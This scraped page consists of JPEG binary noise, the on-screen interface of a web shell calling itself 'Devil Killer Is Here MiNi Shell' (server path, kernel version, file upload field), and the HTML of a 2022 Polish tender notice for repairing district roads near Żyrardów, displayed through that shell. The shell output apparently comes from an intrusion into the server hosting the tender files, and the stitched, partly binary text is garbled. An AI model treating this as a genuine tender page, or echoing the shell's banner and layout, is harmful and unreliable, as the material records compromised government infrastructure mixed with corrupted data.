JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221110/0043543901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont dróg powiatowych w podziale na części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Żyrardowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750152172</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jaktorowska 53</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żyrardów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL926 - Żyrardowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd-zyrardow@pzd-zyrardow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pzd-zyrardow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna administracji samorządowej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Drogi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont dróg powiatowych w podziale na części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e99a9dab-60fd-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00435439</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037732/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Remont drogi powiatowej nr 4135W Bieniewice - Bronisławów - Wiskitki na odcinku od km 9+744 do km 11+759</p> <p class="mb-0">1.1.4 Remont dróg powiatowych: 1) nr 4706W Aleksandrów - gr. woj. (Bolimów) na odcinku od km 0+015 do km 2+955, 2) nr 3835W Kozłów Szlach. - Nowa Sucha - Guzów na odcinku od km 11+049 do km 12+159</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami (składanie oświadczeń, dokumentów, zawiadomień oraz przekazywanie informacji) odbywa się elektronicznie przy użyciu:<br/>- miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/<br/>- ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal<br/>- poczty elektronicznej: pzd-zyrardow@pzd-zyrardow.pl<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zamawiający informuje, że dane osobowe pozyskane w związku z przeprowadzeniem niniejszego postępowania przetwarzane<br/>będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej<br/>„Rozporządzenie RODO” w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>2) Administratorem danych osobowych jest Zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa<br/>Prawo zamówień publicznych, wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i<br/>archiwach.<br/>3) Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu:<br/>a) przeprowadzenie postępowania o udzielenie zamówienia publicznego,<br/>b) zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu wykonawcą,<br/>c) dokonania rozliczenia i płatności związanych z realizacją umowy,<br/>Ogłoszenie nr 2022/BZP 00178947/01 z dnia 2022-05-26<br/>2022-05-26 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>d) przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki Zamawiającego i inne uprawnione podmioty,<br/>e) udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej,<br/>f) archiwizacji postępowania.<br/>4) Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.<br/>5) Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z<br/>przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.<br/>6) Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO:<br/>a) prawo dostępu do danych (art. 15),<br/>b) prawo sprostowania danych (art. 16),<br/>c) prawo do usunięcia danych (art. 17),<br/>d) prawo do ograniczenia przetwarzania danych (art. 18),<br/>e) prawo wniesienia skargi do organu nadzorczego.<br/>7) Osobie, której dane dotyczą nie przysługuje:<br/>a) prawo do usunięcia danych osobowych, „prawo do bycia zapomnianym” w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia<br/>RODO,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO,<br/>c) prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO.<br/>8) Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania<br/>warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może<br/>wykluczeniem wykonawcy z postepowania lub odrzuceniem jego oferty.<br/>9) Wystąpienie z żądaniem o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub umowy.<br/>10) Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany jest wypełnić obowiązki wynikające m.in. z<br/>art. 13 i 14 Rozporządzenia RODO. Wykonawca składając ofertę składa oświadczenie dotyczące przetwarzania danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Nr sprawy: SDiM.26.1.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont drogi powiatowej nr 4135W Bieniewice – Bronisławów – Wiskitki<br/>na odcinku od km 9+744 do km 11+759<br/><br/><br/>Szczegółowy zakres robót zawiera:<br/>- Odtworzenie trasy i punktów wysokościowych przy liniowych robotach (drogi) w terenie <br/> równinnym 2015,00 mb = 2,015 km<br/>- Oczyszczenie mechaniczne nawierzchni bitumicznych <br/> 2015,00 m x 5,10 m = 10.276,50 m2<br/>- Mechaniczne skropienie emulsją asfaltową nawierzchni drogowych – 10.276,50 m2<br/>- Wykonanie warstwy wyrównawczo – wzmacniającej (wiążącej) z mieszanki mineralno – <br/> bitumicznej asfaltowej AC11 W 50/70 (bez granulatu asfaltowego) dla kat. ruchu KR-2 <br/> z transportem, grub. 4 cm<br/> 2015,00 m x 5,10 m = 10.276,50 m2<br/>- Mechaniczne skropienie emulsją asfaltową nawierzchni drogowych <br/> 2015,00 m x 5,00 m = 10.075,00 m2<br/>- Wykonanie warstwy ścieralnej z mieszanki mineralno – bitumicznej asfaltowej AC11 S 50/70 (bez granulatu asfaltowego) dla kat. ruchu KR-2 z transportem, grub. 4 cm<br/> 2015,00 m x 5,00 m = 10.075,00 m2<br/>- Wyrównanie poboczy z uzupełnieniem mieszanką optymalną z kruszywa łamanego <br/> o uziarnieniu 0/31,5 na średnią grubość 8,0 cm, pobocza o szerokości 0,75 m obustronnie <br/> 2015,00mb x 0,75m x 2 x 0,08 m grub. = 241,80 m3.<br/>Wymagania dotyczące jakości materiałów oraz wykonawstwa robót zgodne z:<br/>-	Ogólną Specyfikacją Techniczną (OST) – D-M-00.00.00 – Wymagania ogólne;<br/>-	Ogólną Specyfikacją Techniczną (OST) – D-05.03.05b – Nawierzchnia z betonu asfaltowego. Warstwa wiążąca i wyrównawcza wg PN-EN;<br/>-	Ogólną Specyfikacją Techniczną (OST) – D-05.03.05a – Nawierzchnia z betonu asfaltowego. Warstwa ścieralna wg WT-1 i WT-2;<br/>-	Ogólną Specyfikacją Techniczną (OST) – D-06.03.02 – Naprawa poboczy gruntowych;<br/>- Szczegółowe Specyfikacje Techniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">oferta spełnia wymagania określone niniejszą specyfikacją,<br/>1.2	oferta została złożona, w określonym przez Zamawiającego terminie,<br/>1.3	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego,<br/>1.4 wniesiono poprawnie wadium.<br/>2. Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną punktację: punktacja 0-100 (100%=100pkt). <br/>4. Wybór oferty w zakresie każdego z zadań od 1 do 2 zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert przedstawione w tabeli: <br/> <br/> Nazwa kryterium	Waga<br/> Cena	60<br/> Okres gwarancji i rękojmi 40<br/><br/>5. Zastosowane wzory do obliczenia punktowego. <br/>a) Kryterium nr 1 – Cena:<br/><br/> Cena oferowana minimalna brutto<br/> CENA = --------------------------------------------- x 100 pkt. x 60<br/> Cena badanej oferty brutto <br/><br/>b) Kryterium nr 2 – Okres gwarancji i rękojmi:<br/> Okres gwarancji i rękojmi badanej oferty [w miesiącach] *<br/>OKRES = ----------------------------------------------------------------------- x 100 pkt. x 40<br/>GWARANCJI Najdłuższy okres gwarancji i rękojmi spośród złożonych <br/> ofert [w miesiącach]<br/>* Najkrótszy możliwy okres gwarancji i rękojmi wymagany przez Zamawiającego: 24 miesiące. <br/> Najdłuższy możliwy okres gwarancji i rękojmi: 60 miesięcy. Wykonawca może zadeklarować<br/> termin gwarancji i rękojmi w następujących okresach: 24 lub 36 lub 48 lub 60 miesięcy.<br/>W przypadku gdy Wykonawca nie wpisze w Formularzu Oferty oferowanego okresu gwarancji i rękojmi Zamawiający uzna, że Wykonawca zaoferował minimalny okres gwarancji i rękojmi.<br/>W przypadku zaoferowania okresu gwarancji i rękojmi dłuższego niż 60 miesięcy Zamawiający przyzna Wykonawcy maksymalną liczbę punktów tj. 40.<br/>W przypadku zaoferowania okresu gwarancji i rękojmi krótszego niż 24 miesiące Zamawiający odrzuci ofertę ponieważ jej treść będzie niezgodna z warunkami zamówienia.<br/>6. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>7. Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska najwyższą sumę punktów za wszystkie kryteria łącznie, zgodnie ze wzorem:<br/>P = C + G<br/>gdzie:<br/>P – suma punktów przyznanych Wykonawcy za wszystkie kryteria<br/>C – liczba punktów przyznanych Wykonawcy za kryterium Cena brutto<br/>G – liczba punktów przyznanych Wykonawcy za kryterium Okres gwarancji i rękojmi.<br/>8. Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania obowiązku podatkowego dla zamawiającego, zgodnie z przepisami o podatku od towarów i usług, doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia w zakresie zadania nr 2 dotyczy:<br/> Remont dróg powiatowych:<br/>1)	nr 4706W Aleksandrów – gr. woj. (Bolimów) na odcinku od km 0+015 do km 2+955,<br/>2)	nr 3835W Kozłów Szlach. – Nowa Sucha – Guzów na odcinku od km 11+049 do km 12+159<br/><br/>Szczegółowy zakres robót zawiera:<br/>Droga nr 4706W Aleksandrów – gr. woj. (Bolimów):<br/>- Odtworzenie trasy i punktów wysokościowych przy liniowych robotach (drogi) w terenie <br/> równinnym 2940,00 mb = 2,940 km<br/>- Oczyszczenie mechaniczne nawierzchni bitumicznych <br/> 2940,00 m x 6,00 m = 17.640,00 m2<br/>- Mechaniczne skropienie emulsją asfaltową nawierzchni drogowych – 17.640,00 m2<br/>- Wykonanie warstwy wyrównawczo – wzmacniającej (wiążącej) z mieszanki mineralno – <br/> bitumicznej asfaltowej AC11 W 50/70 (bez granulatu asfaltowego) dla kat. ruchu KR-2 <br/> z transportem, grub. 4 cm<br/> 2940,00 m x 6,00 m = 17.640,00 m2<br/>- Mechaniczne skropienie emulsją asfaltową nawierzchni drogowych – 17.640,00 m2<br/>- Wykonanie warstwy ścieralnej z mieszanki mineralno – bitumicznej asfaltowej AC11 S<br/> 50/70 (bez granulatu asfaltowego) dla kat. ruchu KR-2 z transportem, grub. 4 cm<br/> 2940,00 m x 6,00 m = 17.640,00 m2<br/>- Wyrównanie poboczy z uzupełnieniem mieszanką optymalną z kruszywa łamanego <br/> o uziarnieniu 0/31,5 na średnią grubość 8,0 cm, pobocza o szerokości 1,25 m obustronnie <br/> 2940,00mb x 1,25m x 2 x 0,08 m grub. = 588,00 m3.<br/><br/>Droga nr 3835W Kozłów Szlach. – Nowa Sucha – Guzów: <br/>- Odtworzenie trasy i punktów wysokościowych przy liniowych robotach (drogi) w terenie <br/> równinnym 1110,00 mb = 1,110 km<br/>- Oczyszczenie mechaniczne nawierzchni bitumicznych <br/> 1110,00 m x 5,10 m = 5.661,00 m2<br/>- Mechaniczne skropienie emulsją asfaltową nawierzchni drogowych – 5.661,00 m2<br/>- Wykonanie warstwy wyrównawczo – wzmacniającej (wiążącej) z mieszanki mineralno – <br/> bitumicznej asfaltowej AC11 W 50/70 (bez granulatu asfaltowego) dla kat. ruchu KR-2 <br/> z transportem, grub. 4 cm<br/> 1110,00 m x 5,10 m = 5.661,00 m2<br/>- Mechaniczne skropienie emulsją asfaltową nawierzchni drogowych <br/> 1110,00 m x 5,00 m = 5.550,00 m2<br/>- Wykonanie warstwy ścieralnej z mieszanki mineralno – bitumicznej asfaltowej AC11 S<br/> 50/70 (bez granulatu asfaltowego) dla kat. ruchu KR-2 z transportem, grub. 4 cm<br/> 1110,00 m x 5,00 m = 5.550,00 m2<br/>- Wyrównanie poboczy z uzupełnieniem mieszanką optymalną z kruszywa łamanego <br/> o uziarnieniu 0/31,5 na średnią grubość 8,0 cm, pobocza o szerokości 1,00 m obustronnie <br/> 1110,00mb x 1,00m x 2 x 0,08 m grub. = 177,60 m3. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.1	oferta spełnia wymagania określone niniejszą specyfikacją,<br/>1.2	oferta została złożona, w określonym przez Zamawiającego terminie,<br/>1.3	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego,<br/>1.4 wniesiono poprawnie wadium.<br/>2. Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną punktację: punktacja 0-100 (100%=100pkt). <br/>4. Wybór oferty w zakresie każdego z zadań od 1 do 2 zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert przedstawione w tabeli: <br/> <br/> Nazwa kryterium	Waga<br/> Cena	60<br/> Okres gwarancji i rękojmi 40<br/><br/>5. Zastosowane wzory do obliczenia punktowego. <br/>a) Kryterium nr 1 – Cena:<br/><br/> Cena oferowana minimalna brutto<br/> CENA = --------------------------------------------- x 100 pkt. x 60<br/> Cena badanej oferty brutto <br/><br/>b) Kryterium nr 2 – Okres gwarancji i rękojmi:<br/> Okres gwarancji i rękojmi badanej oferty [w miesiącach] *<br/>OKRES = ----------------------------------------------------------------------- x 100 pkt. x 40<br/>GWARANCJI Najdłuższy okres gwarancji i 